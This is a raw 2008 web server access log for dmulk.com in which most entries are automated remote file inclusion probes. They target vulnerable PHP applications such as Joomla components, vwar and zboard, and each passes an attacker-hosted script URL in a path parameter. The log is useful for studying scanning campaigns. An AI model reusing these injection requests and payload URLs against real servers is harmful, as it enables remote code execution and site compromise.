114.141.2.7 - - [10/Nov/2008:09:51:35 -0800] "GET /logs//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:09:51:39 -0800] "GET /logs/access_071204.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:09:51:41 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:51:43 -0800] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:09:51:44 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:09:51:45 -0800] "GET /logs/access_080914.log//guestbook1//admin.php?include_path=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:09:51:45 -0800] "GET /guestbook1//admin.php?include_path=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:09:51:45 -0800] "GET /logs//guestbook1//admin.php?include_path=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:51:59 -0800] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.33.107 - - [10/Nov/2008:09:52:17 -0800] "GET /logs/access_080402.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://crisis.epicenternetworks.com/forum/Themes/Velocity/images/bo.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.33.107 - - [10/Nov/2008:09:52:17 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://crisis.epicenternetworks.com/forum/Themes/Velocity/images/bo.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.33.107 - - [10/Nov/2008:09:52:17 -0800] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://crisis.epicenternetworks.com/forum/Themes/Velocity/images/bo.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.33.107 - - [10/Nov/2008:09:52:17 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://crisis.epicenternetworks.com/forum/Themes/Velocity/images/bo.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:52:36 -0800] "GET /logs/access_080707.log/reports.php?sub=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:52:36 -0800] "GET /reports.php?sub=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:52:36 -0800] "GET /logs/reports.php?sub=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.25.144.114 - - [10/Nov/2008:09:52:54 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.25.144.114 - - [10/Nov/2008:09:52:54 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
206.221.179.200 - - [10/Nov/2008:09:53:01 -0800] "GET /logs//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [10/Nov/2008:09:53:01 -0800] "GET /logs//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [10/Nov/2008:09:53:01 -0800] "GET /calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [10/Nov/2008:09:53:01 -0800] "GET /calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:53:04 -0800] "GET /reports.php?sub=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:53:05 -0800] "GET /logs/reports.php?sub=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:53:05 -0800] "GET /logs/access_080707.log/reports.php?sub=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:53:18 -0800] "GET /logs/reports.php?sub=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:53:19 -0800] "GET /reports.php?sub=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:53:19 -0800] "GET /logs/access_080707.log/reports.php?sub=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:53:23 -0800] "GET /logs/access_080204.log%20/index.php?option=com_content&task=§ionid=&id=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:53:25 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:53:25 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:53:30 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:53:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:53:39 -0800] "GET /logs/access_080511.log//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:53:39 -0800] "GET /appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:53:39 -0800] "GET /logs//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:53:43 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:53:43 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:46 -0800] "GET /logs/access_071214.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:46 -0800] "GET /logs//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 73026 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:47 -0800] "GET /logs/access_071214.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:47 -0800] "GET /logs//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 73026 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:48 -0800] "GET /?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 94732 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:48 -0800] "GET /logs/access_071214.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:48 -0800] "GET /?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 94732 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:49 -0800] "GET /logs//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 73026 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:49 -0800] "GET /?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 94732 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:49 -0800] "GET /logs/access_071214.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:49 -0800] "GET /logs//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 73026 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:50 -0800] "GET /?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 94732 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:54 -0800] "GET /logs/access_071214.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:55 -0800] "GET /logs//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 73026 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:53:55 -0800] "GET /?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 94700 "-" "Mozilla/5.0" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:53:59 -0800] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.52.166.106 - - [10/Nov/2008:09:54:00 -0800] "GET /logs/access_080819.log/errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.52.166.106 - - [10/Nov/2008:09:54:00 -0800] "GET /errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:54:00 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
72.52.166.106 - - [10/Nov/2008:09:54:00 -0800] "GET /logs/errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.39.234.13 - - [10/Nov/2008:09:54:04 -0800] "GET /logs//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.52.166.106 - - [10/Nov/2008:09:54:06 -0800] "GET /logs/access_080315.log/errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:54:07 -0800] "GET /logs/access_080111.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.39.234.13 - - [10/Nov/2008:09:54:08 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.87.154.41 - - [10/Nov/2008:09:54:10 -0800] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://geocities.com/d.imud/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [10/Nov/2008:09:54:10 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://geocities.com/d.imud/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:13 -0800] "GET /logs/access_080511.log//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:13 -0800] "GET /appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:13 -0800] "GET /logs//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:54:13 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:54:13 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:54:18 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
65.55.211.36 - - [10/Nov/2008:09:54:19 -0800] "GET /blog/index.php/2008/08/12/westoc-2008-trip-61208-62708/trackback/ HTTP/1.1" 200 66122 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:54:22 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:54:22 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:54:22 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:54:23 -0800] "GET /logs/access_081015.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:24 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:25 -0800] "GET /logs/access_080408.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:25 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:54:26 -0800] "GET /logs/access_080809.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:26 -0800] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:30 -0800] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
118.101.40.54 - - [10/Nov/2008:09:54:33 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:54:34 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:54:36 -0800] "GET /logs/access_080326.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:54:36 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:54:37 -0800] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
202.39.234.13 - - [10/Nov/2008:09:54:42 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:43 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:44 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:44 -0800] "GET /logs/access_080408.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:54:46 -0800] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:54:47 -0800] "GET /logs/access_080114.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:54:47 -0800] "GET /logs/access_080320.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:09:54:49 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:09:54:50 -0800] "GET /index.php?pagina=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 200 94996 "-" "libwww-perl/5.810" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:54:52 -0800] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:09:54:52 -0800] "GET /logs/index.php?pagina=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:54:55 -0800] "GET /logs/access_080803.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:54:55 -0800] "GET /logs/access_080226.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:54:59 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:55:01 -0800] "GET /logs/access_080201.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:55:05 -0800] "GET /logs/access_080620.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:55:05 -0800] "GET /logs/access_080408.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:55:06 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:55:07 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:09:55:08 -0800] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:09:55:12 -0800] "GET /logs/access_080516.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:55:17 -0800] "GET /logs/access_080730.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:55:19 -0800] "GET /logs/access_080702.log//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:55:19 -0800] "GET /logs//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:55:19 -0800] "GET /logs/access_080319.log//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:55:22 -0800] "GET /logs/access_071215.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:09:55:36 -0800] "GET /logs/access_071214.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:55:36 -0800] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:55:36 -0800] "GET /logs/access_080907.log//modules/vwar/admin/admin.php?vwar_root=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
